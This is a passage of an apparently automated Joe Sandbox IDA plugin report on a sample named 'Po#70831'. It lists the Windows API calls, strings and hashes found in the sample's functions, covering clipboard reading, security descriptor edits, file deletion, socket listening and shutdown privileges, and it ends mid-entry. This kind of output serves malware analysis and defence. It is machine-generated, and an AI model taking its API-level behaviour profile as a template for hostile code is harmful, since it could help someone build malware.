                                        • Part of subcall function 004F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004F1114
                                        • Part of subcall function 004F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1120
                                        • Part of subcall function 004F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F112F
                                        • Part of subcall function 004F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1136
                                        • Part of subcall function 004F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004F114D
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004F0BCC
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004F0C00
                                      • GetLengthSid.ADVAPI32(?), ref: 004F0C17
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 004F0C51
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004F0C6D
                                      • GetLengthSid.ADVAPI32(?), ref: 004F0C84
                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 004F0C8C
                                      • HeapAlloc.KERNEL32(00000000), ref: 004F0C93
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004F0CB4
                                      • CopySid.ADVAPI32(00000000), ref: 004F0CBB
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004F0CEA
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004F0D0C
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004F0D1E
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0D45
                                      • HeapFree.KERNEL32(00000000), ref: 004F0D4C
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0D55
                                      • HeapFree.KERNEL32(00000000), ref: 004F0D5C
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0D65
                                      • HeapFree.KERNEL32(00000000), ref: 004F0D6C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004F0D78
                                      • HeapFree.KERNEL32(00000000), ref: 004F0D7F
                                        • Part of subcall function 004F1193: GetProcessHeap.KERNEL32(00000008,004F0BB1,?,00000000,?,004F0BB1,?), ref: 004F11A1
                                        • Part of subcall function 004F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004F0BB1,?), ref: 004F11A8
                                        • Part of subcall function 004F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004F0BB1,?), ref: 004F11B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                       • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 4175595110-0
                                      • Opcode ID: 2d5f1704bc8da92c056902cb83a6dec0c8ada0e95613e0a7828c451dbb2874f6
                                      • Instruction ID: d214224b36d5db0afe8def25b0415991b76285af542fc2937e35f8cfb7a5bd01
                                      • Opcode Fuzzy Hash: 2d5f1704bc8da92c056902cb83a6dec0c8ada0e95613e0a7828c451dbb2874f6
                                      • Instruction Fuzzy Hash: DA717E7190020AABDF20DFA4DC49FBFBBBDBF55300F044516EA14E6292D779A909CB64
                                      APIs
                                      • OpenClipboard.USER32(0052CC08), ref: 0050EB29
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0050EB37
                                      • GetClipboardData.USER32(0000000D), ref: 0050EB43
                                      • CloseClipboard.USER32 ref: 0050EB4F
                                      • GlobalLock.KERNEL32(00000000), ref: 0050EB87
                                      • CloseClipboard.USER32 ref: 0050EB91
                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0050EBBC
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0050EBC9
                                      • GetClipboardData.USER32(00000001), ref: 0050EBD1
                                      • GlobalLock.KERNEL32(00000000), ref: 0050EBE2
                                      • GlobalUnlock.KERNEL32(00000000,?), ref: 0050EC22
                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 0050EC38
                                      • GetClipboardData.USER32(0000000F), ref: 0050EC44
                                      • GlobalLock.KERNEL32(00000000), ref: 0050EC55
                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0050EC77
                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0050EC94
                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0050ECD2
                                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0050ECF3
                                      • CountClipboardFormats.USER32 ref: 0050ED14
                                      • CloseClipboard.USER32 ref: 0050ED59
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                       • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                      • String ID:
                                      • API String ID: 420908878-0
                                      • Opcode ID: d43489080e51d5fd6084a977a935efb00b9477a1fd05879f61451240d45ac27b
                                      • Instruction ID: e7809e4ddaeffab4ef2e11bb729c8ebeeeb870108f006ef32166c34758c1f3e3
                                      • Opcode Fuzzy Hash: d43489080e51d5fd6084a977a935efb00b9477a1fd05879f61451240d45ac27b
                                      • Instruction Fuzzy Hash: 1C618C352042019FD710EF24D896E2E7FA4BF95704F24495DF856972E2CB31ED0ADBA2
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 005069BE
                                      • FindClose.KERNEL32(00000000), ref: 00506A12
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00506A4E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00506A75
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00506AB2
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00506ADF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                       • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                      • API String ID: 3830820486-3289030164
                                      • Opcode ID: 55bf3b9106e3e5419da327e0b2dc82e5df7633525f03047c29d6f122db5acb49
                                      • Instruction ID: 66f9b2e6658e10af9409b0ef0b9acd03d7d9eaccf70a19fca43a3d7f2dc9214f
                                      • Opcode Fuzzy Hash: 55bf3b9106e3e5419da327e0b2dc82e5df7633525f03047c29d6f122db5acb49
                                      • Instruction Fuzzy Hash: 0AD153715083009EC710EB95C891EAFBBECBF99704F44492EF585C7191EB38DA48C762
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00509663
                                      • GetFileAttributesW.KERNEL32(?), ref: 005096A1
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 005096BB
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 005096D3
                                      • FindClose.KERNEL32(00000000), ref: 005096DE
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 005096FA
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0050974A
                                      • SetCurrentDirectoryW.KERNEL32(00556B7C), ref: 00509768
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00509772
                                      • FindClose.KERNEL32(00000000), ref: 0050977F
                                      • FindClose.KERNEL32(00000000), ref: 0050978F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                       • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1409584000-438819550
                                      • Opcode ID: b126bb0e7b2d0d3ec3df55f8018119850a17732f1f1bee9a86412c2e1bf78fde
                                      • Instruction ID: aef49d68296c915baa79d1e846e818f41e4d2b41166e8d061115c58893bb9bbc
                                      • Opcode Fuzzy Hash: b126bb0e7b2d0d3ec3df55f8018119850a17732f1f1bee9a86412c2e1bf78fde
                                      • Instruction Fuzzy Hash: 7C310332541219AECB24EFB4DC08ADE7FACFF0A320F104196F851E20D2DB30DD448A64
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 005097BE
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00509819
                                      • FindClose.KERNEL32(00000000), ref: 00509824
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00509840
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00509890
                                      • SetCurrentDirectoryW.KERNEL32(00556B7C), ref: 005098AE
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 005098B8
                                      • FindClose.KERNEL32(00000000), ref: 005098C5
                                      • FindClose.KERNEL32(00000000), ref: 005098D5
                                        • Part of subcall function 004FDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004FDB00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                       • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 2640511053-438819550
                                      • Opcode ID: e1a84e7db9d269f9c79d474b329546de794113af1615aea73b10e7140485e81e
                                      • Instruction ID: a92a540efb3c534da9b58a2da931bcf4e8f5422ec919130f3db2fb4f3145d0ad
                                      • Opcode Fuzzy Hash: e1a84e7db9d269f9c79d474b329546de794113af1615aea73b10e7140485e81e
                                      • Instruction Fuzzy Hash: DE31E5315016196EDF24EFB4EC48ADE7FACBF16320F148596E850A21D6DB30DD498A64
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 00508257
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00508267
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00508273
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00508310
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00508324
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00508356
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0050838C
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00508395
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                       • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryTime$File$Local$System
                                      • String ID: *.*
                                      • API String ID: 1464919966-438819550
                                      • Opcode ID: e7902ea9d87c82ef790d8382a2e19a228bbf5f4ebf684421b53e27b9ff1d40e4
                                      • Instruction ID: 221d22eb09d4f023d7cc6c5ea058e8d16283f2a2f40a2599d45ca1432f02fd27
                                      • Opcode Fuzzy Hash: e7902ea9d87c82ef790d8382a2e19a228bbf5f4ebf684421b53e27b9ff1d40e4
                                      • Instruction Fuzzy Hash: 75615C765043059FCB10EF61C840DAEBBE8FF89318F04492EF99987251DB35E945CB96
                                      APIs
                                        • Part of subcall function 00493AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00493A97,?,?,00492E7F,?,?,?,00000000), ref: 00493AC2
                                        • Part of subcall function 004FE199: GetFileAttributesW.KERNEL32(?,004FCF95), ref: 004FE19A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004FD122
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 004FD1DD
                                      • MoveFileW.KERNEL32(?,?), ref: 004FD1F0
                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 004FD20D
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004FD237
                                        • Part of subcall function 004FD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,004FD21C,?,?), ref: 004FD2B2
                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 004FD253
                                      • FindClose.KERNEL32(00000000), ref: 004FD264
                                      Strings
                                      Similarity
                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 1946585618-1173974218
                                      • Opcode ID: ba4dc1119e8d700a812e86f8fa99deca4516c0797e6ffb7d04fd89377b3dc56e
                                      • Instruction ID: 90e3c9ee64f11e65724a2185dcdf4fa287e67dbdef99260fae3e1907eee86085
                                      • Opcode Fuzzy Hash: ba4dc1119e8d700a812e86f8fa99deca4516c0797e6ffb7d04fd89377b3dc56e
                                      • Instruction Fuzzy Hash: E7617031C0110D9ACF15EBE1CA529FEBB76AF15308F24416EE50277192EB385F09DBA5
                                      APIs
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: 3b797960a0444c1aa69faa8d8dcacf0d9e1b8a708fa82ff5b1646130f8c28614
                                      • Instruction ID: 0017f64dd80056485ffd85cbcebe6eebd4e2f42d51c3007dcce308be550473dd
                                      • Opcode Fuzzy Hash: 3b797960a0444c1aa69faa8d8dcacf0d9e1b8a708fa82ff5b1646130f8c28614
                                      • Instruction Fuzzy Hash: D4418C35204611AFD720DF19D88AB19BFA5FF55328F24889DE41A8B6A2C735FC46CB90
                                      APIs
                                        • Part of subcall function 004F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F170D
                                        • Part of subcall function 004F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F173A
                                        • Part of subcall function 004F16C3: GetLastError.KERNEL32 ref: 004F174A
                                      • ExitWindowsEx.USER32(?,00000000), ref: 004FE932
                                      Strings
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $ $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-3163812486
                                      • Opcode ID: fb1daadb07fa8e1c51cbc2052f8fb9757bc2c053d29c2ae6966df46ca54cb41b
                                      • Instruction ID: 8214b2a7dabc2362e5e3edba0b89829f9fd812ca43d0248eb7ecd4f80c6f75cd
                                      • Opcode Fuzzy Hash: fb1daadb07fa8e1c51cbc2052f8fb9757bc2c053d29c2ae6966df46ca54cb41b
                                      • Instruction Fuzzy Hash: 3B012BB2610218EFEB2467769C85FBF769C9B14746F140523FE03E21F2D5E85C4591B8
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00511276
                                      • WSAGetLastError.WSOCK32 ref: 00511283
                                      • bind.WSOCK32(00000000,?,00000010), ref: 005112BA
                                      • WSAGetLastError.WSOCK32 ref: 005112C5
                                      • closesocket.WSOCK32(00000000), ref: 005112F4
                                      • listen.WSOCK32(00000000,00000005), ref: 00511303
                                      • WSAGetLastError.WSOCK32 ref: 0051130D
                                      • closesocket.WSOCK32(00000000), ref: 0051133C
                                      Similarity
                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                      • String ID:
                                      • API String ID: 540024437-0
                                      • Opcode ID: 1978e724414c8d797c1469dd49d1db6c388585df28e7f2287d12b5aad4990d41
                                      • Instruction ID: c2011439e960d7b413f65dedd6cbeb40dce52146f3810bcd2126100e60e928f5
                                      • Opcode Fuzzy Hash: 1978e724414c8d797c1469dd49d1db6c388585df28e7f2287d12b5aad4990d41
                                      • Instruction Fuzzy Hash: 37419E356005409FE720DF25C488B69BFE6BF46318F188098E9668F297C771EC86CBE1
                                      APIs
                                      • _free.LIBCMT ref: 004CB9D4
                                      • _free.LIBCMT ref: 004CB9F8
                                      • _free.LIBCMT ref: 004CBB7F
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00533700), ref: 004CBB91
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0056121C,000000FF,00000000,0000003F,00000000,?,?), ref: 004CBC09
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00561270,000000FF,?,0000003F,00000000,?), ref: 004CBC36
                                      • _free.LIBCMT ref: 004CBD4B
                                      Similarity
                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                      • String ID:
                                      • API String ID: 314583886-0
                                      • Opcode ID: fa0a9f61fd7989fe87b135ff6ffce67364b68af8263d57cde58bbf738d2a8ec8
                                      • Instruction ID: 384d93360553588c0819bba08873730a24d8da654f9e5b5b7e772f639c782526
                                      • Opcode Fuzzy Hash: fa0a9f61fd7989fe87b135ff6ffce67364b68af8263d57cde58bbf738d2a8ec8
                                      • Instruction Fuzzy Hash: 7AC1357D900244AECB609F7A8C52FAB7BA8EF41310F18419FE891D7351E7799E019BD8
                                      APIs
                                        • Part of subcall function 00493AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00493A97,?,?,00492E7F,?,?,?,00000000), ref: 00493AC2
                                        • Part of subcall function 004FE199: GetFileAttributesW.KERNEL32(?,004FCF95), ref: 004FE19A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004FD420
                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 004FD470
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004FD481
                                      • FindClose.KERNEL32(00000000), ref: 004FD498
                                      • FindClose.KERNEL32(00000000), ref: 004FD4A1
                                      Strings
                                      Similarity
                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 2649000838-1173974218
                                      • Opcode ID: de9822704e515c02280e1648b8450a5558ba4491f62298cf1096fed7e54201b6
                                      • Instruction ID: 6ac606a68f92b49ced5217486d122c89d7aafe8548cfdb7b3c0f8f7da07dc4c0
                                      • Opcode Fuzzy Hash: de9822704e515c02280e1648b8450a5558ba4491f62298cf1096fed7e54201b6
                                      • Instruction Fuzzy Hash: 303190714083459BC710EF65C8518BF7BA8BEA2308F444E2EF5D593191EB38AA09D76B
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: a07ce24fd708da4445472cc1e6a52f9d8c0b30194b8bee4a97d855831a08a68a
                                      • Instruction ID: 159500f812a271818e221b78004eb3a4af4c4f3762d0234c59c9bea19520b93d
                                      • Opcode Fuzzy Hash: a07ce24fd708da4445472cc1e6a52f9d8c0b30194b8bee4a97d855831a08a68a
                                      • Instruction Fuzzy Hash: 40C23A75E046288FDB65CE299D40BEAB7B6EB48304F1441EFD80DE7241E778AE858F44
                                      APIs
                                      • _wcslen.LIBCMT ref: 005064DC
                                      • CoInitialize.OLE32(00000000), ref: 00506639
                                      • CoCreateInstance.OLE32(0052FCF8,00000000,00000001,0052FB68,?), ref: 00506650
                                      • CoUninitialize.OLE32 ref: 005068D4
                                      Strings
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: eb6234d30360cda08bb27761fca1591996836332e7246ff9dfcbcbb3a02c8370
                                      • Instruction ID: 5ff684401c62da839b957e77680be19f1fa2e269cbaa8873c262ea54f1cd5f43
                                      • Opcode Fuzzy Hash: eb6234d30360cda08bb27761fca1591996836332e7246ff9dfcbcbb3a02c8370
                                      • Instruction Fuzzy Hash: 8DD15A71508201AFC714EF25C881D6BBBE8FF95708F40496EF5958B291EB71ED09CBA2
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 005122E8
                                        • Part of subcall function 0050E4EC: GetWindowRect.USER32(?,?), ref: 0050E504
                                      • GetDesktopWindow.USER32 ref: 00512312
                                      • GetWindowRect.USER32(00000000), ref: 00512319
                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00512355
                                      • GetCursorPos.USER32(?), ref: 00512381
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005123DF
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                      • String ID:
                                      • API String ID: 2387181109-0
                                      • Opcode ID: f4b72bb03bfa2530df84dc78af2a7b4929e78ab84f55a3ea69f10936e1e94745
                                      • Instruction ID: c2e770cd58572be583495153d37a288d91607d7dad73869c2fcb9b4a46f426e6
                                      • Opcode Fuzzy Hash: f4b72bb03bfa2530df84dc78af2a7b4929e78ab84f55a3ea69f10936e1e94745
                                      • Instruction Fuzzy Hash: 1431ED72104305ABDB20DF15C849FABBBA9FF88314F00091EF99497291DB34EA59CB92
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00509B78
                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00509C8B
                                        • Part of subcall function 00503874: GetInputState.USER32 ref: 005038CB
                                        • Part of subcall function 00503874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00503966
                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00509BA8
                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00509C75
                                      Strings
                                      Similarity
                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                      • String ID: *.*
                                      • API String ID: 1972594611-438819550
                                      • Opcode ID: 45b94f8330abf21f15c3968f1a535bf4da5fce3b435719810fc05333e504c78d
                                      • Instruction ID: 8821f05f9ef129409c602b85748b55d8721d30361c6bd87d19aaa6bca88338d1
                                      • Opcode Fuzzy Hash: 45b94f8330abf21f15c3968f1a535bf4da5fce3b435719810fc05333e504c78d
                                      • Instruction Fuzzy Hash: 47415C7190420A9FDF14EF65C889AEEBFB8FF15310F24416AE805A21D6EB309E44CF65
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 004A9A4E
                                      • GetSysColor.USER32(0000000F), ref: 004A9B23
                                      • SetBkColor.GDI32(?,00000000), ref: 004A9B36
                                      Similarity
                                      • API ID: Color$LongProcWindow
                                      • String ID:
                                      • API String ID: 3131106179-0
                                      • Opcode ID: fbebd449faaba922a81e13b4463329a9d272dd281dde479723d8e8388b56148a
                                      • Instruction ID: 6c7ef22377e9ebcab710b3195db5ab15d89b0b71a8c9190e3b8fdbff438e00c2
                                      • Opcode Fuzzy Hash: fbebd449faaba922a81e13b4463329a9d272dd281dde479723d8e8388b56148a
                                      • Instruction Fuzzy Hash: 51A10A70208494BEE7249A3D9C48E7B3A9DEFA7365F18410BF502C67D1CA6D9D02D27E
                                      APIs
                                        • Part of subcall function 0051304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0051307A
                                        • Part of subcall function 0051304E: _wcslen.LIBCMT ref: 0051309B
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0051185D
                                      • WSAGetLastError.WSOCK32 ref: 00511884
                                      • bind.WSOCK32(00000000,?,00000010), ref: 005118DB
                                      • WSAGetLastError.WSOCK32 ref: 005118E6
                                      • closesocket.WSOCK32(00000000), ref: 00511915
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 1601658205-0
                                      • Opcode ID: 9c6e4cdcd95b7e5bdfae3514f5afc6817b90e3994b1e9159e433dce252203f5a
                                      • Instruction ID: e271870b33c5bd71947091e4b57b25ebc1f8f1ccfa7b9ae35f9a44cf637084c6
                                      • Opcode Fuzzy Hash: 9c6e4cdcd95b7e5bdfae3514f5afc6817b90e3994b1e9159e433dce252203f5a
